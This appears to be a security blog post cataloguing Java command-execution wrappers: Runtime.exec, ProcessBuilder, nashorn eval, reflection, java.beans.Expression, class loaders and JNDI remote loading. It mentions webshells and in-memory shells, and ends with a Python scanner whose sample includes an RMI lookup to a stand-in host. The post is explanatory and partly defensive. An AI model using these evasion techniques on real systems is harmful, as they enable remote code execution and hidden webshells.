0x01 exec or ProcessBuilder
java.lang.Runtime.getRuntime().exec(new String[]{"open", "./"});
and
new ProcessBuilder(new String[]{"open", "./"}).start();
Relationship between the two: set a breakpoint on ProcessBuilder.start and you will see that exec also ends up executing there.
0x02 Using the ScriptEngineManager engine
import java.io.BufferedReader;
import java.io.InputStream;
import java.io.InputStreamReader;
import javax.script.ScriptEngineManager;

// The JavaScript evaluated by nashorn builds the argv array and calls Runtime.exec from script code
// (nashorn ships with JDK 8 through 14; on later JDKs getEngineByName("nashorn") returns null)
String s1 = "s=[3];s[0]='/bin/bash';s[1]='-c';s[2]='";
String s2 = "ls";
String s3 = "';java.lang.Runtime.getRuntime().exec(s);";
Process process = (Process) new ScriptEngineManager().getEngineByName("nashorn").eval(s1 + s2 + s3);
// Read the child process's stdout
InputStream inputStream = process.getInputStream();
StringBuilder stringBuilder = new StringBuilder();
BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(inputStream));
String line;
while ((line = bufferedReader.readLine()) != null) {
    stringBuilder.append(line).append("\n");
}
System.out.println(stringBuilder.toString());
0x03 Reflection
import java.lang.reflect.Method;

String command = (args.length != 0) ? args[0] : "/bin/sh,-c,open ./";
String[] execArgs = command.split(",");
Class<?> rt = Class.forName("java.lang.Runtime");
// or: Class<?> rt = ClassLoader.getSystemClassLoader().loadClass("java.lang.Runtime");
Method gr = rt.getMethod("getRuntime");
// execArgs is a String[], so the overload to look up is exec(String[]), not exec(String)
Method ex = rt.getMethod("exec", String[].class);
// cast to Object so the array is passed as one argument rather than spread as varargs
ex.invoke(gr.invoke(null), (Object) execArgs);
0x04 Custom class loader
A custom class loader loads a class from a byte array (or from bytes encoded in some other form); Tomcat has a BCEL class loader implementation. Behinder (冰蝎) works the same way: the client sends the payload to the Behinder webshell on the server, which then loads it as a class. The difference is that web class loading does not fully follow parent delegation: after a JSP file is modified, the latest result is served without a restart (hot reload), loading the newest class and unloading the old one; WebappClassLoader implements this.
0x05 Other wrappers:
For example java.beans.Expression, which in the end also calls ProcessBuilder.start
import java.beans.Expression;

String[] strings = {"open", "./"};
ProcessBuilder processBuilder = new ProcessBuilder(strings);
String var1 = "start";
Object[] var2 = new Object[]{};
// Expression reflectively invokes processBuilder.start() when its value is requested
Expression var3 = new Expression(processBuilder, var1, var2);
var3.getValue();
0x06 JNDI injection, remotely loading a jar
Including RMI, LDAP, etc.
The methods above are not independent of one another; they are all related to some degree. Some deserialization vulnerabilities, for instance, also use JNDI injection, and in the end a class loader loads and executes the class. This is quite flexible in exploitation, though each method has its own restrictions; ys also lets the code to be executed be customized quite flexibly, and later variants derive from it: a custom class loader that loads bytecode from data, reflection to obtain req/res for echoing output, and reflection into Tomcat's container components to write an in-memory shell.
More to be added and revised later...
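Added example, not from the original post: a small Python triage scanner that flags the wrapper patterns walked through above (Runtime.exec, ProcessBuilder, nashorn via ScriptEngineManager, reflection on java.lang.Runtime, java.beans.Expression, JNDI lookup, defineClass) in Java source or decompiled output. The signature names, regexes and the sample input are constructed for illustration.

```python
import re

# Signatures for the wrappers this post walks through (constructed for this
# example; heuristic, not exhaustive).
PATTERNS = {
    "runtime_exec": re.compile(r"Runtime\s*\.\s*getRuntime\s*\(\s*\)\s*\.\s*exec\s*\("),
    "process_builder": re.compile(r"new\s+ProcessBuilder\s*\("),
    "script_engine": re.compile(r"ScriptEngineManager\s*\(\s*\)\s*\.\s*getEngineByName\s*\("),
    "reflection_runtime": re.compile(r'(Class\.forName|loadClass)\s*\(\s*"java\.lang\.Runtime"\s*\)'),
    "reflection_exec": re.compile(r'getMethod\s*\(\s*"exec"'),
    "beans_expression": re.compile(r"new\s+(java\.beans\.)?Expression\s*\("),
    "jndi_lookup": re.compile(r"\blookup\s*\("),
    "defineclass": re.compile(r"\bdefineClass\s*\("),
}


def scan_java(source: str) -> list[tuple[int, str]]:
    """Return (line_number, wrapper_name) for every line matching a signature.

    A line matching several signatures is reported once per signature, in
    PATTERNS order. This is a triage aid only: a call whose name is assembled
    from concatenated strings or resolved through an obfuscated reflective
    lookup will not match, so a clean result means "nothing obvious", not
    "nothing there".
    """
    hits = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for name, pattern in PATTERNS.items():
            if pattern.search(line):
                hits.append((lineno, name))
    return hits


# Constructed sample: one line per wrapper from the post, plus a benign line.
SAMPLE = '''\
Process p = Runtime.getRuntime().exec(new String[]{"open", "./"});
new ProcessBuilder("open", "./").start();
Object o = new ScriptEngineManager().getEngineByName("nashorn").eval(s1 + s2 + s3);
Class<?> rt = Class.forName("java.lang.Runtime");
Method ex = rt.getMethod("exec", String[].class);
Expression expr = new Expression(pb, "start", new Object[]{});
Object ref = new InitialContext().lookup("rmi://host.example/obj");
return defineClass(name, bytes, 0, bytes.length);
String greeting = "hello";
'''

if __name__ == "__main__":
    for lineno, name in scan_java(SAMPLE):
        print(f"line {lineno}: {name}")
```

Since every wrapper above converges on ProcessBuilder.start, auditing that call at runtime (for example with a JVM agent) catches what a source-level regex pass misses.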